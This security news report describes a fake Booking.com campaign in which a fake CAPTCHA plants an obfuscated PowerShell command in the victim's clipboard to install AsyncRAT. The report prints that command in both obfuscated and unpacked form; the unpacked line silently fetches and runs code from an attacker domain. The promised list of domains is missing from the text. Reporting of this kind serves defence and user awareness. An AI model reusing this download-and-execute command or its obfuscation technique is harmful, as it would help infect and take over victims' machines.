With the summer travel season in full swing, cybercriminals have launched a sophisticated campaign targeting travelers through fake Booking.com websites, redirect links, and fraudulent sponsored ads.
According to recent research by Malwarebytes, this campaign leverages evolving domains, fake CAPTCHAs, and dangerous clipboard hijacking techniques to deliver AsyncRAT malware—a Remote Access Trojan that poses severe risks to users’ data and privacy.
The scam first appeared in mid-May and continues to evolve, with threat actors rotating malicious domains every two to three days to evade detection and blacklists.
The attack vector typically begins when users, searching for travel deals, land on a malicious link disguised as a legitimate Booking.com page—often through gaming sites, social platforms, or sponsored advertisements.
Upon arrival, visitors are greeted by a fake CAPTCHA form, a technique increasingly popular among fraudsters.
Unlike legitimate CAPTCHAs, this prompt is designed to grant the site permission to access the user’s clipboard. When unsuspecting users tick the box, a script quietly injects malicious content into their clipboard.
Technical Breakdown: Clipboard Hijacking and PowerShell Payloads
The clipboard injection, executed via JavaScript’s document.execCommand('copy'), plants an obfuscated PowerShell command. The attackers employ deliberate casing, variable name fragments, and quote interruptions to obfuscate their real intentions:
```powershell
pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
```
Unpacked, it becomes:
```powershell
powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
```
If a user follows the on-screen instructions—typically prompting them to paste and execute this command in the Windows Run dialog—a PowerShell window opens invisibly, fetching and running two executables (ckjg.exe and Stub.exe) from the attacker’s server.
The payload, detected as Backdoor.AsyncRAT, gives full remote control of the victim’s machine to attackers, enabling theft of credentials, financial data, and potentially far-reaching identity fraud.
Users of security tools such as Malwarebytes Browser Guard are alerted when their clipboard is accessed, often with explicit warnings about suspicious content.
Chrome may also display generic warnings about unsafe sites, though these can be vague and easily ignored without awareness of the underlying risk.
Malwarebytes researchers have tracked several domains associated with this campaign, with the URLs changing every few days. Recent examples include:
Anyone booking travel online, especially via search engines, should exercise extreme caution and verify URLs carefully.
As holiday scams grow more sophisticated, vigilance and technical awareness are key to safe and stress-free travel planning. Always book through trusted sources and watch for red flags—your vacation plans, and your personal data, depend on it.